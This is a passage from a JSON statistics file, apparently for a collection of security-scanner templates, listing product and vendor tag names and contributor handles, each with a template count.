ount":1},{"name":"velotismart_project","count":1},{"name":"wp-video-gallery-free","count":1},{"name":"myfitnesspal-author","count":1},{"name":"nevma","count":1},{"name":"gambit","count":1},{"name":"simply-schedule-appointments","count":1},{"name":"discogs","count":1},{"name":"geocaching","count":1},{"name":"sunshine","count":1},{"name":"endress","count":1},{"name":"rsyncd","count":1},{"name":"kwejkpl","count":1},{"name":"plone","count":1},{"name":"ecommerce-product-catalog","count":1},{"name":"newmeet","count":1},{"name":"orbys","count":1},{"name":"squadcast","count":1},{"name":"quixplorer_project","count":1},{"name":"advancedpopupcreator","count":1},{"name":"prestashop-module","count":1},{"name":"codeception","count":1},{"name":"uber","count":1},{"name":"fotka","count":1},{"name":"rss","count":1},{"name":"scrapingant","count":1},{"name":"intel","count":1},{"name":"reality","count":1},{"name":"chronoforums","count":1},{"name":"orangescrum","count":1},{"name":"datezone","count":1},{"name":"lokalise","count":1},{"name":"realtek","count":1},{"name":"dvdFab","count":1},{"name":"javafaces","count":1},{"name":"loganalyzer","count":1},{"name":"ipdiva","count":1},{"name":"openx","count":1},{"name":"microservice","count":1},{"name":"maroc-nl","count":1},{"name":"nnru","count":1},{"name":"radius","count":1},{"name":"pettingzooco-mastodon-instance","count":1},{"name":"a360inc","count":1},{"name":"presspage","count":1},{"name":"readtomyshoe_project","count":1},{"name":"vi","count":1},{"name":"slides","count":1},{"name":"taxonomies-change-checkbox-to-radio-buttons","count":1},{"name":"manyvids","count":1},{"name":"jsfiddle","count":1},{"name":"apasionados","count":1},{"name":"target","count":1},{"name":"ioncube","count":1},{"name":"filemage","count":1},{"name":"directum","count":1},{"name":"attenzione","count":1},{"name":"kakao","count":1},{"name":"opencti","count":1},{"name":"photoblocks","count":1},{"name":"vnc","count":1},{"name":"expose","count":1},{"name":"kindsoft","count":1},{"name":"prestahome","count":1},{"name":"webnms","count":1},{"name":"naviwebs","count":1},{"name":"h2database","count":1},{"name":"web-suite","count":1},{"name":"hostio","count":1},{"name":"ulterius","count":1},{"name":"grandnode","count":1},{"name":"homebridge","count":1},{"name":"narnoo_distributor_project","count":1},{"name":"playtube","count":1},{"name":"musictraveler","count":1},{"name":"mod-db","count":1},{"name":"sevone","count":1},{"name":"disqus","count":1},{"name":"osu","count":1},{"name":"wildcard","count":1},{"name":"satellite","count":1},{"name":"parler-archived-posts","count":1},{"name":"chromecast","count":1},{"name":"etouch","count":1},{"name":"sassy","count":1},{"name":"freelancetoindia","count":1},{"name":"runatlantis","count":1},{"name":"efak","count":1},{"name":"nimble","count":1},{"name":"mediakits","count":1},{"name":"login-as-customer-or-user","count":1},{"name":"mastodon","count":1},{"name":"rt-n16","count":1},{"name":"eureka","count":1},{"name":"kotburger","count":1},{"name":"b2bbuilder","count":1},{"name":"mastown-mastodon-instance","count":1},{"name":"hcl","count":1},{"name":"clustering","count":1},{"name":"skeepers","count":1},{"name":"master","count":1},{"name":"achecker","count":1},{"name":"bblog-ru","count":1},{"name":"asanhamayesh","count":1},{"name":"AlphaWeb","count":1},{"name":"sv3c","count":1},{"name":"epp","count":1},{"name":"weglot","count":1},{"name":"nazgul","count":1},{"name":"mitric","count":1},{"name":"phpnow","count":1},{"name":"xyxel","count":1},{"name":"gawk","count":1},{"name":"podcast_channels_project","count":1},{"name":"announcekit","count":1},{"name":"biostar2","count":1},{"name":"sceditor","count":1},{"name":"imageshack","count":1},{"name":"mylot","count":1},{"name":"jvtwitter","count":1},{"name":"view","count":1},{"name":"jorani_project","count":1},{"name":"inspireui","count":1},{"name":"opms","count":1},{"name":"cd-action","count":1},{"name":"remkon","count":1},{"name":"opengear","count":1},{"name":"dockge","count":1},{"name":"joommasters","count":1},{"name":"rtsp","count":1},{"name":"booking-calendar","count":1},{"name":"beardev","count":1},{"name":"japandict","count":1},{"name":"tcexam","count":1},{"name":"arris","count":1},{"name":"cliniccases","count":1},{"name":"imgur","count":1},{"name":"wp-guppy","count":1},{"name":"ziahamza","count":1},{"name":"adminset","count":1},{"name":"public","count":1},{"name":"minds","count":1},{"name":"Chase","count":1},{"name":"shoretel","count":1},{"name":"eurotel","count":1},{"name":"flyway","count":1},{"name":"phabricator","count":1},{"name":"pivotal_software","count":1},{"name":"altenergy","count":1},{"name":"saltapi","count":1},{"name":"twittee-text-tweet","count":1},{"name":"kopano","count":1},{"name":"openwire","count":1},{"name":"pulmi","count":1},{"name":"packetstrom","count":1},{"name":"calendly","count":1},{"name":"supervisord","count":1},{"name":"lgate","count":1},{"name":"cph2","count":1},{"name":"mystrom","count":1},{"name":"pillowfort","count":1},{"name":"activehelper","count":1},{"name":"swim_team_project","count":1},{"name":"zwave","count":1},{"name":"html2wp_project","count":1},{"name":"vlc-media","count":1},{"name":"shopex","count":1},{"name":"nextchat","count":1},{"name":"boka","count":1},{"name":"cmseasy","count":1},{"name":"nordpass","count":1},{"name":"nvrsolo","count":1},{"name":"alkacon","count":1},{"name":"spinnaker","count":1},{"name":"drone","count":1},{"name":"2kblater","count":1},{"name":"opengraphr","count":1},{"name":"flatpm","count":1},{"name":"wowjoomla","count":1},{"name":"code-garage","count":1},{"name":"rocklobster","count":1},{"name":"bittube","count":1},{"name":"fujitsu","count":1},{"name":"simpel-reserveren_project","count":1},{"name":"wp-fastest-cache","count":1},{"name":"header-footer-code-manager","count":1},{"name":"softvelum","count":1},{"name":"ricoh","count":1},{"name":"venomrat","count":1},{"name":"sympa","count":1},{"name":"campaignmonitor","count":1},{"name":"nzbget","count":1},{"name":"pahtool","count":1},{"name":"catchplugins","count":1},{"name":"johnmccollum","count":1},{"name":"wolni-slowianie","count":1},{"name":"blackduck","count":1},{"name":"provectus","count":1},{"name":"pichome","count":1},{"name":"gofile","count":1},{"name":"infographic-and-list-builder-ilist","count":1},{"name":"alcoda","count":1},{"name":"pushgateway","count":1},{"name":"helm","count":1},{"name":"udemy","count":1},{"name":"tmate","count":1},{"name":"guppy","count":1},{"name":"microcomputers","count":1},{"name":"acymailing","count":1},{"name":"codoforumrce","count":1},{"name":"lemlist","count":1},{"name":"jvm","count":1},{"name":"steller","count":1},{"name":"qantumthemes","count":1},{"name":"gn-publisher","count":1},{"name":"jk","count":1},{"name":"fxwebdesign","count":1},{"name":"mikoviny","count":1},{"name":"daily_prayer_time_project","count":1},{"name":"mastodon-tootcommunity","count":1},{"name":"linear","count":1},{"name":"wpswings","count":1},{"name":"bws-realty","count":1},{"name":"socomec","count":1},{"name":"wc-multivendor-marketplace","count":1},{"name":"wp-shoutbox-live-chat","count":1},{"name":"clearcom","count":1},{"name":"estream","count":1},{"name":"m-files","count":1},{"name":"99robots","count":1},{"name":"luracast","count":1},{"name":"amtythumb_project","count":1},{"name":"schools_alert_management_script_project","count":1},{"name":"cerebro","count":1},{"name":"ns","count":1},{"name":"h-sphere","count":1},{"name":"webgrind","count":1},{"name":"zenscrape","count":1},{"name":"cherokee","count":1},{"name":"ogc","count":1},{"name":"pantsel","count":1},{"name":"fandalism","count":1},{"name":"adultism","count":1},{"name":"defectdojo","count":1},{"name":"duckduckgo","count":1},{"name":"lightdash","count":1},{"name":"mobotix","count":1},{"name":"xploitspy","count":1},{"name":"automatisch","count":1},{"name":"myportfolio","count":1},{"name":"eyoumail","count":1},{"name":"rudder","count":1},{"name":"sporcle","count":1},{"name":"myfitnesspal-community","count":1},{"name":"soccitizen4eu","count":1},{"name":"myvuehelp","count":1},{"name":"h3c-imc","count":1},{"name":"hydracrypt","count":1},{"name":"kernel","count":1},{"name":"checklist","count":1},{"name":"webpconverter","count":1},{"name":"hiberworld","count":1},{"name":"arduino","count":1},{"name":"bdsmlr","count":1},{"name":"redbubble","count":1},{"name":"nsq","count":1},{"name":"bws-adpush","count":1},{"name":"vsftpd","count":1},{"name":"smartsense","count":1},{"name":"ap-pricing-tables-lite","count":1},{"name":"quick-event-manager","count":1},{"name":"teradici","count":1},{"name":"mixi","count":1},{"name":"maccmsv10","count":1},{"name":"bws-google-maps","count":1},{"name":"dgtl","count":1},{"name":"thinkupthemes","count":1},{"name":"anycomment","count":1},{"name":"mariadb","count":1},{"name":"jalios","count":1},{"name":"planetestream","count":1},{"name":"registry","count":1},{"name":"mastoai","count":1},{"name":"fastapi","count":1},{"name":"redlion","count":1},{"name":"orchard","count":1},{"name":"themeinprogress","count":1},{"name":"anyproxy","count":1},{"name":"customize-login-image","count":1},{"name":"mura","count":1},{"name":"cal","count":1},{"name":"mx","count":1},{"name":"pihole","count":1},{"name":"soundcloud","count":1},{"name":"ups","count":1},{"name":"linshare","count":1},{"name":"bitcoin","count":1},{"name":"wbcecms","count":1},{"name":"yellowfin","count":1},{"name":"joobi","count":1},{"name":"nexusdb","count":1},{"name":"openbb","count":1},{"name":"toolkit","count":1},{"name":"shirnecms","count":1},{"name":"rpmdb","count":1},{"name":"monitorix","count":1},{"name":"piratebay","count":1},{"name":"image-optimizer-wd","count":1},{"name":"easyappointments","count":1},{"name":"magix","count":1},{"name":"phpsocialnetwork","count":1},{"name":"fedora","count":1},{"name":"shortpixel-adaptive-images","count":1},{"name":"authorstream","count":1},{"name":"intellislot","count":1},{"name":"fandom","count":1},{"name":"appserv_open_project","count":1},{"name":"codeastrology","count":1},{"name":"rujjie","count":1},{"name":"get-simple.","count":1},{"name":"openerp","count":1},{"name":"showcase","count":1},{"name":"spidercontrol","count":1},{"name":"vine","count":1},{"name":"isecure","count":1},{"name":"icegram","count":1},{"name":"localize_my_post_project","count":1}],"authors":[{"name":"dhiyaneshdk","count":1289},{"name":"daffainfo","count":864},{"name":"dwisiswant0","count":803},{"name":"pussycat0x","count":354},{"name":"pikpikcu","count":353},{"name":"ritikchaddha","count":346},{"name":"pdteam","count":297},{"name":"princechaddha","count":269},{"name":"ricardomaia","count":232},{"name":"geeknik","count":231},{"name":"theamanrawat","count":223},{"name":"r3y3r53","count":200},{"name":"0x_akoko","count":179},{"name":"gy741","count":158},{"name":"rxerium","count":142},{"name":"righettod","count":141},{"name":"sleepingbag945","count":132},{"name":"arafatansari","count":118},{"name":"tess","count":109},{"name":"pdresearch","count":82},{"name":"iamnoooob","count":69},{"name":"idealphase","count":66},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"rootxharsh","count":62},{"name":"akincibor","count":59},{"name":"for3stco1d","count":55},{"name":"philippedelteil","count":53},{"name":"gaurang","count":42},{"name":"edoardottt","count":42},{"name":"johnk3r","count":41},{"name":"c-sh0","count":35},{"name":"j4vaovo","count":35},{"name":"adam crosser","count":31},{"name":"luisfelipe146","count":31},{"name":"mastercho","count":29},{"name":"ice3man","count":29},{"name":"pwnhxl","count":28},{"name":"hardik-solanki","count":24},{"name":"organiccrap","count":24},{"name":"techbrunchfr","count":23},{"name":"ctflearner","count":23},{"name":"harsh","count":23},{"name":"ffffffff0x","count":22},{"name":"parthmalhotra","count":20},{"name":"sullo","count":18},{"name":"kazgangap","count":18},{"name":"cckuailong","count":18},{"name":"bhutch","count":17},{"name":"random-robbie","count":16},{"name":"shaikhyaser","count":16},{"name":"0xpugazh","count":16},{"name":"lu4nx","count":16},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"unapibageek","count":15},{"name":"dogasantos","count":14},{"name":"tenbird","count":14},{"name":"milo2012","count":14},{"name":"userdehghani","count":14},{"name":"r3dg33k","count":14},{"name":"elsfa7110","count":13},{"name":"0ri2n","count":13},{"name":"sharath","count":13},{"name":"theabhinavgaur","count":13},{"name":"melbadry9","count":13},{"name":"nullfuzz","count":13},{"name":"meme-lord","count":12},{"name":"kazet","count":12},{"name":"suman_kar","count":12},{"name":"wdahlenb","count":11},{"name":"cyllective","count":11},{"name":"co5mos","count":10},{"name":"0x240x23elu","count":10},{"name":"random_robbie","count":10},{"name":"hackergautam","count":10},{"name":"nadino","count":10},{"name":"logicalhunter","count":10},{"name":"alph4byt3","count":10},{"name":"oppsec","count":9},{"name":"emadshanab","count":9},{"name":"olearycrew","count":9},{"name":"adamcrosser","count":9},{"name":"momika233","count":9},{"name":"initstring","count":9},{"name":"fabaff","count":9},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"irshad ahamed","count":8},{"name":"noraj","count":8},{"name":"_0xf4n9x_","count":8},{"name":"that_juan_","count":8},{"name":"veshraj","count":8},{"name":"its0x08","count":7},{"name":"me_dheeraj (https://twitter.com/dheerajmadhukar)","count":7},{"name":"huta0","count":7},{"name":"harshbothra_","count":7},{"name":"randomstr1ng","count":7},{"name":"tarunkoyalwar","count":7},{"name":"caspergn","count":7},{"name":"divya_mudgal","count":7},{"name":"amit-jd","count":7},{"name":"nodauf","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"leovalcante","count":7},{"name":"dr_set","count":7},{"name":"clem9669","count":6},{"name":"byt3bl33d3r","count":6},{"name":"devang-solanki","count":6},{"name":"megamansec","count":6},{"name":"ja1sh","count":6},{"name":"imnightmaree","count":6},{"name":"hahwul","count":6},{"name":"forgedhallpass","count":6},{"name":"__fazal","count":6},{"name":"evan rubinstein","count":6},{"name":"pathtaga","count":6},{"name":"pentest_swissky","count":6},{"name":"gitlab red team","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"puzzlepeaches","count":6},{"name":"justaacat","count":6},{"name":"xelkomy","count":6},{"name":"robotshell","count":5},{"name":"podalirius","count":5},{"name":"r12w4n","count":5},{"name":"vicrack","count":5},{"name":"arm!tage","count":5},{"name":"gtrrnr","count":5},{"name":"mr-xn","count":5},{"name":"your3cho","count":5},{"name":"panch0r3d","count":5},{"name":"defr0ggy","count":5},{"name":"prajiteshsingh","count":5},{"name":"kh4sh3i","count":5},{"name":"shine","count":5},{"name":"s0obi","count":5},{"name":"r3naissance","count":5},{"name":"andreluna","count":5},{"name":"yanyun","count":5},{"name":"powerexploit","count":5},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"lucky0x0d","count":5},{"name":"pulsesecurity.co.nz","count":4},{"name":"jpg0mez","count":4},{"name":"iamnooob","count":4},{"name":"king-alexander","count":4},{"name":"dadevel","count":4},{"name":"scent2d","count":4},{"name":"lum8rjack","count":4},{"name":"ice3man543","count":4},{"name":"e_schultze_","count":4},{"name":"nybble04","count":4},{"name":"wisnupramoedya","count":4},{"name":"cookiehanhoan","count":4},{"name":"tanq16","count":4},{"name":"shankar acharya","count":4},{"name":"incogbyte","count":4},{"name":"m4lwhere","count":4},{"name":"h1ei1","count":4},{"name":"k0pak4","count":4},{"name":"3th1c_yuk1","count":4},{"name":"heeress","count":4},{"name":"xxcdd","count":4},{"name":"0xr2r","count":4},{"name":"ggranjus","count":4},{"name":"dolev farhi","count":4},{"name":"randomrobbie","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"jarijaas","count":3},{"name":"fyoorer","count":3},{"name":"salts","count":3},{"name":"evergreencartoons","count":3},{"name":"mavericknerd","count":3},{"name":"arcc","count":3},{"name":"bernardofsr","count":3},{"name":"c4sper0","count":3},{"name":"shifacyclewala","count":3},{"name":"e1a","count":3},{"name":"emenalf","count":3},{"name":"badboycxcc","count":3},{"name":"imjust0","count":3},{"name":"vsh00t","count":3},{"name":"lark-lab","count":3},{"name":"binaryfigments","count":3},{"name":"j3ssie","count":3},{"name":"isacaya","count":3},{"name":"splint3r7","count":3},{"name":"ekrause","count":3},{"name":"canberbamber","count":3},{"name":"matt galligan","count":3},{"name":"impramodsargar","count":3},{"name":"whoever","count":3},{"name":"unstabl3","count":3},{"name":"parth","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"sushantkamble","count":3},{"name":"lucasljm2001","count":3},{"name":"ph33r","count":3},{"name":"johnjhacking","count":3},{"name":"davidmckennirey","count":3},{"name":"dr0pd34d","count":3},{"name":"alifathi-h1","count":3},{"name":"aringo","count":3},{"name":"cheesymoon","count":3},{"name":"true13","count":3},{"name":"z3bd","count":3},{"name":"flx","count":3},{"name":"xianke","count":3},{"name":"fxploit","count":3},{"name":"huowuzhao","count":3},{"name":"thomas_from_offensity","count":3},{"name":"_generic_human_","count":3},{"name":"me9187","count":3},{"name":"skeltavik","count":3},{"name":"vagnerd","count":3},{"name":"coldfish","count":3},{"name":"farish","count":3},{"name":"dudez","count":3},{"name":"andydoering","count":3},{"name":"0w4ys","count":3},{"name":"atomiczsec","count":3},{"name":"taielab","count":3},{"name":"f1tz","count":3},{"name":"swissky","count":3},{"name":"ambassify","count":3},{"name":"hackerarpan","count":2},{"name":"ayadim","count":2},{"name":"lotusdll","count":2},{"name":"ep1csage","count":2},{"name":"notnotnotveg","count":2},{"name":"cocxanh","count":2},{"name":"pbuff07","count":2},{"name":"joshlarsen","count":2},{"name":"randomdhiraj","count":2},{"name":"dbrwsky","count":2},{"name":"liwermor","count":2},{"name":"sascha brendel","count":2},{"name":"florianmaak","count":2},{"name":"dahse89","count":2},{"name":"zomsop82","count":2},{"name":"convisoappsec","count":2},{"name":"y4er","count":2},{"name":"0xelkomy","count":2},{"name":"vavkamil","count":2},{"name":"brenocss","count":2},{"name":"sinkettu","count":2},{"name":"g4l1t0","count":2},{"name":"cckuakilong","count":2},{"name":"paperpen","count":2},{"name":"6mile","count":2},{"name":"pxmme1337","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"mrharshvardhan","count":2},{"name":"myztique","count":2},{"name":"nkxxkn","count":2},{"name":"sy3omda","count":2},{"name":"danielmofer","count":2},{"name":"k11h-de","count":2},{"name":"shelled","count":2},{"name":"c3l3si4n","count":2},{"name":"hetroublemakr","count":2},{"name":"amsda","count":2},{"name":"parzival","count":2},{"name":"kre80r","count":2},{"name":"v0idc0de","count":2},{"name":"streetofhackerr007","count":2},{"name":"nuk3s3c","count":2},{"name":"dheerajmadhukar","count":2},{"name":"amirhossein raeisi","count":2},{"name":"supras","count":2},{"name":"rafaelwdornelas","count":2},{"name":"kiblyn11","count":2},{"name":"uomogrande","count":2},{"name":"sbani","count":2},{"name":"0xsapra","count":2},{"name":"mzack9999","count":2},{"name":"herry","count":2},{"name":"christianpoeschl","count":2},{"name":"luci","count":2},{"name":"github.com/its0x08","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"zy9ard3","count":2},{"name":"koti2","count":2},{"name":"charles d.","count":2},{"name":"bing0o","count":2},{"name":"ree4pwn","count":2},{"name":"udit_thakkur","count":2},{"name":"0xsmiley","count":2},{"name":"supr4s","count":2},{"name":"danmcinerney","count":2},{"name":"t3l3machus","count":2},{"name":"egemenkochisarli","count":2},{"name":"666asd","count":2},{"name":"w4cky_","count":2},{"name":"foulenzer","count":2},{"name":"d4vy","count":2},{"name":"korteke","count":2},{"name":"thabisocn","count":2},{"name":"gal nagli","count":2},{"name":"gevakun","count":2},{"name":"bmcel","count":2},{"name":"ajaysenr","count":2},{"name":"manas_harsh","count":2},{"name":"ehsahil","count":2},{"name":"codexlynx","count":2},{"name":"msegoviag","count":2},{"name":"michal mikolas (nanuqcz)","count":2},{"name":"joshua rogers","count":2},{"name":"redteambrasil","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"x1m_martijn","count":2},{"name":"bp0lr","count":2},{"name":"socketz","count":2},{"name":"thardt-praetorian","count":2},{"name":"0xcrypto","count":2},{"name":"nvn1729","count":2},{"name":"0xrudra","count":2},{"name":"serrapa","count":2},{"name":"shankaracharya","count":2},{"name":"8arthur","count":2},{"name":"joeldeleep","count":2},{"name":"thevillagehacker","count":2},{"name":"wa1tf0rme","count":2},{"name":"paradessia","count":2},{"name":"bsysop","count":2},{"name":"martincodes-de","count":2},{"name":"davidegirardi","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"bananabr","count":2},{"name":"mohammedsaneem","count":2},{"name":"dogancanbakir","count":2},{"name":"clarkvoss","count":2},{"name":"lstatro","count":2},{"name":"geekby","count":2},{"name":"brucelsone","count":2},{"name":"arliya","count":2},{"name":"n-thumann","count":2},{"name":"usdag","count":2},{"name":"z0ne","count":2},{"name":"0xnirvana","count":2},{"name":"maximus decimus","count":2},{"name":"kishore-hariram","count":2},{"name":"h0j3n","count":2},{"name":"raesene","count":2},{"name":"thezakman","count":2},{"name":"afaq","count":2},{"name":"moritz nentwig","count":2},{"name":"jbaines-r7","count":1},{"name":"retr0","count":1},{"name":"luskabol","count":1},{"name":"shifacyclewla","count":1},{"name":"xeldax","count":1},{"name":"kagamigawa","count":1},{"name":"y0no","count":1},{"name":"null_hypothesis","count":1},{"name":"mr.bobo hp","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"rotembar","count":1},{"name":"8authur","count":1},{"name":"colbyjack1134","count":1},{"name":"tangxiaofeng7","count":1},{"name":"amirmsafari","count":1},{"name":"shelld3v","count":1},{"name":"0xceeb","count":1},{"name":"revblock","count":1},{"name":"rivalsec","count":1},{"name":"sospiro","count":1},{"name":"soyelmago","count":1},{"name":"mihhailsokolov","count":1},{"name":"mesaglio","count":1},{"name":"kr1shna4garwal","count":1},{"name":"d0rkerdevil","count":1},{"name":"fq_hsu","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"andysvints","count":1},{"name":"elmahdi","count":1},{"name":"osamahamad","count":1},{"name":"galoget","count":1},{"name":"opencirt","count":1},{"name":"yiran","count":1},{"name":"sak1","count":1},{"name":"ransomsec","count":1},{"name":"francescocarlucci","count":1},{"name":"fpatrik","count":1},{"name":"geraldino2","count":1},{"name":"elouhi","count":1},{"name":"kaizensecurity","count":1},{"name":"rschio","count":1},{"name":"hardik-rathod","count":1},{"name":"failopen","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"ling","count":1},{"name":"bad5ect0r","count":1},{"name":"zeyad azima","count":1},{"name":"christbowel","count":1},{"name":"drfabiocastro","count":1},{"name":"josecosta","count":1},{"name":"andirrahmani1","count":1},{"name":"miguelsegoviagil","count":1},{"name":"vzamanillo","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"furkansayim","count":1},{"name":"toufik-airane","count":1},{"name":"mass0ma","count":1},{"name":"amir-h-fallahi","count":1},{"name":"dabla","count":1},{"name":"napgh0st","count":1},{"name":"udinchan","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"alevsk","count":1},{"name":"piyushchhiroliya","count":1},{"name":"s1r1u5_","count":1},{"name":"vikas kundu","count":1},{"name":"0xteles","count":1},{"name":"b4uh0lz","count":1},{"name":"exploitation","count":1},{"name":"noamrathaus","count":1},{"name":"arall","count":1},{"name":"mah3sec_","count":1},{"name":"r3nz0","count":1},{"name":"domenicoveneziano","count":1},{"name":"cbadke","count":1},{"name":"chetgan","count":1},{"name":"jfbes","count":1},{"name":"rodnt","count":1},{"name":"archer","count":1},{"name":"axrk","count":1},{"name":"guax1","count":1},{"name":"jaimin gondaliya","count":1},{"name":"arqsz","count":1},{"name":"_c0wb0y_","count":1},{"name":"lethargynavigator","count":1},{"name":"pratik khalane","count":1},{"name":"bjhulst","count":1},{"name":"ap3r","count":1},{"name":"furkansenan","count":1},{"name":"x6263","count":1},{"name":"freakyclown","count":1},{"name":"adilsoybali","count":1},{"name":"duty_1g","count":1},{"name":"absshax","count":1},{"name":"yashanand155","count":1},{"name":"none","count":1},{"name":"omarjezi","count":1},{"name":"booboohq","count":1},{"name":"notsoevilweasel","count":1},{"name":"millermedia","count":1},{"name":"marcos_iaf","count":1},{"name":"aringo-bf","count":1},{"name":"charanrayudu","count":1},{"name":"carrot2","count":1},{"name":"aravind","count":1},{"name":"palanichamy_perumal","count":1},{"name":"af001","count":1},{"name":"willd96","count":1},{"name":"izn0u","count":1},{"name":"petruknisme","count":1},{"name":"hexcat","count":1},{"name":"diablo","count":1},{"name":"mlec","count":1},{"name":"dk999","count":1},{"name":"hczdmr","count":1},{"name":"fur1na","count":1},{"name":"intx0x80","count":1},{"name":"abbas.heybati","count":1},{"name":"irshadahamed","count":1},{"name":"akokonunes","count":1},{"name":"viondexd","count":1},{"name":"kiks7","count":1},{"name":"mukundbhuva","count":1},{"name":"nagli","count":1},{"name":"luqman","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"whotwagner","count":1},{"name":"whynotke","count":1},{"name":"tirtha","count":1},{"name":"jonathanwalker","count":1},{"name":"undefl0w","count":1},{"name":"jas37","count":1},{"name":"compr00t","count":1},{"name":"fmunozs","count":1},{"name":"bugvsme","count":1},{"name":"danigoland","count":1},{"name":"mammad_rahimzada","count":1},{"name":"breno_css","count":1},{"name":"w0tx","count":1},{"name":"0xceba","count":1},{"name":"alperenkesk","count":1},{"name":"kiransau","count":1},{"name":"shiar","count":1},{"name":"unp4ck","count":1},{"name":"w8ay","count":1},{"name":"aayush vishnoi","count":1},{"name":"wlayzz","count":1},{"name":"banana69","count":1},{"name":"caon","count":1},{"name":"noah @thesubtlety","count":1},{"name":"becivells","count":1},{"name":"r3s ost","count":1},{"name":"higor melgaço","count":1},{"name":"xc1ym","count":1},{"name":"esonhugh","count":1},{"name":"sttlr","count":1},{"name":"iphantasmic","count":1},{"name":"brabbit10","count":1},{"name":"petergrifin","count":1},{"name":"therealtoastycat","count":1},{"name":"h4kux","count":1},{"name":"topscoder","count":1},{"name":"jcockhren","count":1},{"name":"lbb","count":1},{"name":"evolutionsec","count":1},{"name":"thebinitghimire","count":1},{"name":"0ut0fb4nd","count":1},{"name":"ramondunker","count":1},{"name":"droberson","count":1},{"name":"1nf1n7y","count":1},{"name":"unknown","count":1},{"name":"infosecsanyam","count":1},{"name":"_harleo","count":1},{"name":"d4ly","count":1},{"name":"hanlaomo","count":1},{"name":"puben","count":1},{"name":"ndmalc","count":1},{"name":"official_blackhat13","count":1},{"name":"act1on3","count":1},{"name":"ringo","count":1},{"name":"deena","count":1},{"name":"wpsec","count":1},{"name":"open-sec","count":1},{"name":"ola456","count":1},{"name":"amanrawat","count":1},{"name":"kailashbohara","count":1},{"name":"lrtk-coder","count":1},{"name":"patralos","count":1},{"name":"igibanez","count":1},{"name":"smaranchand","count":1},{"name":"ahmed sherif","count":1},{"name":"0h1in9e","count":1},{"name":"micha3lb3n","count":1},{"name":"houdinis","count":1},{"name":"erethon","count":1},{"name":"jaskaran","count":1},{"name":"carson chan","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"akash.c","count":1},{"name":"wabafet","count":1},{"name":"0xtavian","count":1},{"name":"thirukrishnan","count":1},{"name":"dievus","count":1},{"name":"ofjaaah","count":1},{"name":"hakluke","count":1},{"name":"majidmc2","count":1},{"name":"viniciuspereiras","count":1},{"name":"dwbzn","count":1},{"name":"tea","count":1},{"name":"hateshape","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"sorrowx3","count":1},{"name":"arr0way","count":1},{"name":"aron molnar","count":1},{"name":"retr02332","count":1},{"name":"qianbenhyu","count":1},{"name":"harshinsecurity","count":1},{"name":"apt-mirror","count":1},{"name":"matt miller","count":1},{"name":"floriandewald","count":1},{"name":"akshansh","count":1},{"name":"0xrod","count":1},{"name":"hotpot","count":1},{"name":"skylark-lab","count":1},{"name":"hazana","count":1},{"name":"aresx","count":1},{"name":"myst7ic","count":1},{"name":"ooooooo_q","count":1},{"name":"bywalks","count":1},{"name":"aaronchen0","count":1},{"name":"mchklt","count":1},{"name":"0xparth","count":1},{"name":"ayadi","count":1},{"name":"rumble773","count":1},{"name":"shockwave","count":1},{"name":"zhenwarx","count":1},{"name":"babybash","count":1},{"name":"jteles","count":1},{"name":"sdcampbell","count":1},{"name":"k3rwin","count":1},{"name":"mabdullah22","count":1},{"name":"arjunchandarana","count":1},{"name":"luqmaan hadia","count":1},{"name":"paper-pen","count":1},{"name":"hlop","count":1},{"name":"qlkwej","count":1},{"name":"savik","count":1},{"name":"ky9oss","count":1},{"name":"djoevanka","count":1},{"name":"rotemreiss","count":1},{"name":"flag007","count":1},{"name":"tirtha_mandal","count":1},{"name":"hyunsoo-ds","count":1},{"name":"jeya seelan","count":1},{"name":"lady_bug","count":1},{"name":"lark lab","count":1},{"name":"natto97","count":1},{"name":"jrolf","count":1},{"name":"alex","count":1},{"name":"miryangjung","count":1},{"name":"davidfegyver","count":1},{"name":"mayankpandey01","count":1},{"name":"luciannitescu","count":1},{"name":"sshell","count":1},{"name":"west-wise","count":1},{"name":"sinsinology","count":1},{"name":"sherlocksecurity","count":1},{"name":"shivanshkhari","count":1},{"name":"sickwell","count":1},{"name":"oscarintherocks","count":1},{"name":"bartu utku sarp","count":1},{"name":"juicypotato1","count":1},{"name":"p-l-","count":1},{"name":"yusakie","count":1},{"name":"elder tao","count":1},{"name":"imhunterand","count":1},{"name":"stupidfish","count":1},{"name":"dali","count":1},{"name":"screamy","count":1},{"name":"denandz","count":1},{"name":"phillipo","count":1},{"name":"nytr0gen","count":1},{"name":"unkl4b","count":1},{"name":"evan rubinstien","count":1},{"name":"daffianfo","count":1},{"name":"mubassirpatel","count":1},{"name":"s1r1us","count":1},{"name":"queencitycyber","count":1},{"name":"f1she3","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"kurohost","count":1},{"name":"aaban solutions","count":1},{"name":"olewagner","count":1},{"name":"regala_","count":1},{"name":"exid","count":1},{"name":"blckraven","count":1},{"name":"nielsing","count":1},{"name":"lingtren","count":1},{"name":"mordavid","count":1},{"name":"0xd0ff9","count":1},{"name":"xstp","count":1},{"name":"orpheus","count":1},{"name":"carlosvieira","count":1},{"name":"gpiechnik2","count":1},{"name":"pphuahua","count":1},{"name":"jc175","count":1},{"name":"momen 